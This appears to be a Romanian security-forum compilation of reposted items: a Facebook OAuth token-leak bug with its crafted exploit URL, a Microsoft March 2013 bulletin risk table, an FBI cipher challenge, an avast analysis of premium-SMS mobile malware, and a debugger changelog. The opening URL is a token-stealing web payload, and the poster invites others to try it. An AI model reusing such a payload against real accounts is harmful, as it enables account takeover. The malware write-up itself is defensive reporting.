https://www.facebook.com/dialog/permissions.request?app_id=220764691281998&display=page&next=https%3A%2F%2Ftouch.facebook.com%2F%2523%2521%2Fapps%2Ftestestestte%2F&response_type=token&perms=email&fbconnect=1 This bug was also reported to Facebook Security Team last week by Nir Goldshlager and patched now, if you are a hacker, we expect YOU to hack it again ! Sursa: Facebook hacking accounts using another OAuth vulnerability - Hacking News

Ba da, dar nu am pus link-ul acela. Poate sunt persoane care vor sa incerce.

[h=3]Assessing risk for the March 2013 security updates[/h]swiat 12 Mar 2013 10:07 AM Today we released seven security bulletins addressing 20 CVE’s. Four of the bulletins have a maximum severity rating of Critical, and three have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment. [TABLE] [TR] [TD]Bulletin[/TD] [TD]Most likely attack vector[/TD] [TD]Max Bulletin Severity[/TD] [TD]Max Exploit-ability Index[/TD] [TD]Likely first 30 days impact[/TD] [TD]Platform mitigations and key notes[/TD] [/TR] [TR] [TD]MS13-021 (Internet Explorer) [/TD] [TD]Victim browses to a malicious webpage.[/TD] [TD]Critical[/TD] [TD]1[/TD] [TD]Exploit code for CVE-2013-1288, an issue affecting IE8, is publicly available. Likely to see reliable exploits developed within next 30 days for other vulnerabilities addressed by this update as well.[/TD] [TD]IE 10 on Windows 7 is not affected.[/TD] [/TR] [TR] [TD]MS13-022 (Silverlight) [/TD] [TD]Victim browses to a malicious webpage.[/TD] [TD]Critical[/TD] [TD]1[/TD] [TD]Likely to see reliable exploits developed within next 30 days.[/TD] [TD]Affects Silverlight 5.[/TD] [/TR] [TR] [TD]MS13-027 (Windows USB driver) [/TD] [TD]Attacker physically inserts malicious USB device into victim’s workstation or server, resulting in code execution at SYSTEM.[/TD] [TD]Important[/TD] [TD]1[/TD] [TD]Likely to see reliable exploits developed within next 30 days.[/TD] [TD]Pre-auth code execution only possible for attacker able to physically insert malicious hardware device into victim computer. See this blog post for more background on this vulnerability.[/TD] [/TR] [TR] [TD]MS13-024 (SharePoint 2010) [/TD] [TD]Attacker issues a search query on the SharePoint site with malicious script in the query string. In certain circumstances, a SharePoint admin may view search queries in such a way that the script from the attacker’s search query is run in the context of the SharePoint administrator’s session.[/TD] [TD]Critical[/TD] [TD]1[/TD] [TD]Likely to see reliable exploits developed within next 30 days.[/TD] [TD]Affects only SharePoint Server 2010 Service Pack 1, no earlier or later versions of SharePoint.[/TD] [/TR] [TR] [TD]MS13-023 (Visio Viewer 2010) [/TD] [TD]Victim uses Visio Viewer 2010 to opens malicious Visio .DXF file.[/TD] [TD]Critical[/TD] [TD]2[/TD] [TD]Less likely to see reliable exploit developed for this vulnerability. Visio Viewer exploits not often seen in the wild and this one looks more difficult than usual to exploit for reliable code execution.[/TD] [TD]Visio itself not affected by this vulnerability directly. Only Visio Viewer 2010 affected.[/TD] [/TR] [TR] [TD]MS13-025 (OneNote 2010) [/TD] [TD]Attacker lures victim to open OneNote file from a malicious or attacker-controlled directory. Attacker uses this vulnerability to cause process memory from the victim’s OneNote process to be written back to the file in the attacker’s directory, potentially leaking information to the attacker.[/TD] [TD]Important[/TD] [TD]n/a[/TD] [TD]Not possible to leverage this vulnerability for code execution directly. Information disclosure only.[/TD] [TD]Affects only OneNote 2010 Service Pack 1, no earlier or later versions of OneNote. Attacker must lure victim to opening file from a server or location they control. Only information in the OneNote process at the time of user opening the malicious file could become accessible to the attacker.[/TD] [/TR] [TR] [TD]MS13-026 (Office Outlook for Mac) [/TD] [TD]Attacker sends victim an email with links to external content. Content is loaded without prompting user.[/TD] [TD]Important[/TD] [TD]n/a[/TD] [TD]Not possible to leverage this vulnerability for code execution directly. Information disclosure only.[/TD] [TD] [/TD] [/TR] [/TABLE] - Jonathan Ness, MSRC Engineering Sursa: Assessing risk for the March 2013 security updates - Security Research & Defense - Site Home - TechNet Blogs

Can You Crack a Code? Cica e problema data la cursul meu de cryptografie de la facultate. 12/24/09 We've challenged you before—in November 2007, December 2008, and May 2009—to unravel a code and reveal its secret message like the “cryptanalysts” in our FBI Laboratory. In our latest quiz, we've switched gears a bit, using pictogram symbols based on Native American motifs. And with more than 50 words to decipher, it's our longest one so far. For the first time, we're also posting the answer (see the bottom of this page) in case you are stumped. We ask, however, that you not post the solution on the web so that everyone can have a chance to give it a try. Once again: If you want a primer on basic cipher systems and how to break them, see the article "." Good luck! Note: Sorry, but cracking this code doesn't guarantee you a job with the FBI! But do check out careers with us at FBIJobs.gov. Sursa: FBI — Cryptanalysis Challenge 2009

Bun, VIP.

[h=2]Mobile Drive-By Malware example[/h]Jan Širmer March 11th, 2013 Several days ago we received a complaint about javascrpt.ru. After a bit of research, we found that it tries to mimic ajax.google.com and jquery, but the code is an obfuscated/packed redirector. After removing two layers of obfuscation, we found a list of conditions checking visitors’ user Agent. From these conditions. we got a clue and focused on mobile devices. It all starts when a user start browsing internet from their mobile devices. They visit a legitimate site that’s been hacked. This site contains a link to the site javascrpt.ru, where visitors’ browser data is sent. If script hosted at javascrpt.ru recognizes the visitor’s user Agent string as one of the list of conditions, the visitor is redirected to the malicious site, usually hosted at legitimate hosting, distributing malicious files for mobile devices. When users reach this site, the drive-by download starts. We found different behaviors for different devices. For non Android mobiles, a file called load.php ( 2DECBD7C9D058A0BFC27AD446F8B474D99977A857B1403294C0D10078C2DB51D ) is downloaded, though in a fact it is a regular Java file. But as you can see our users are well protected: But the question is what is really happening with an unprotected user? After running this file, the user expects a running application that they started, but in this case a list of agreements appears. And the first line is ‘To gain access to content, you must agree to the terms presented below’. And what are those terms? 1. To gain access to the Service wa**y.ru/ content to make payment by sending up to 3 SMS messages 2. For complete information on pricing, it can be found at the web site: www.mo****1.ru/ (This site doesn’t work right now ) Both Android and other devices are sending SMS to the Russian premium numbers NUMBER = “7255?; NUMBER = “7151?; NUMBER = “9151?; NUMBER = “2855?; After sending SMS, just a simple ICQ application is downloaded from same site: *REMOVED*/land_paysites/files/icq.jar To show better what happens when this site is reached from an Android device, you can check the next screenshots. At first, a file called, e.g., browser.apk (94FDC9CFD801E79A45209BFDC30711CB393E39E6BF2DD43CE805318E80123C14) is downloaded to the device — without the person’s knowledge. You can see in the install window that this application wants access to suspicious services that cost you money. Even in application permissions you can find suspicious permissions for your messages and directly call phone numbers that can cost you money, too. But fortunately avast! stops this application before it can cost you a huge amount of money. If a user install this application, its behavior is very similar to non-Android devices. Device sends pay text messages to those numbers and then downloads and installs a basic Dolphin browser from h***t.ru/land_browsers/files/dolphin.apk Users should be really careful if they found in theirs mobile device some unknown application. Fortunately everybody can read where application will get access to but unfortunately a lot of users don’t really pay attention to required permissions and it can cost them a lot of money but using good antivirus can help them to be protected. Sursa: http://blog.avast.com/2013/03/11/mobile-drive-by-malware-example/

[h=1]Nanomite - Graphical Debugger for x64 and x86 on Windows[/h] [h=2]Changelog[/h] [h=3]Version 0.1 beta 7[/h] fixed some small handling bugs fixed a bug in disassembler which did not replace old protection on memory after disassembling fixed a bug which did not show terminated processes in DetailView fixed a bug which did not show terminated threads in DetailView fixed a bug which did not clean up memory on manual debugge stop improved DB handler added resolve of jump conditions to improve StepOver added "Return" and "Backspace" Hotkey to navigate in Disassembler added "Clear Log" context menu in LogBox added "Show Source" context menu in Disassembler added "Goto Function" context menu in Callstack added a crash handler added Source Viewer added memory pool for performance improvment and memory leak reduction added mouse scrolling in disassembler and stack added direkt run of target after using menu to select a file Cod sursa: https://github.com/zer0fl4g/Nanomite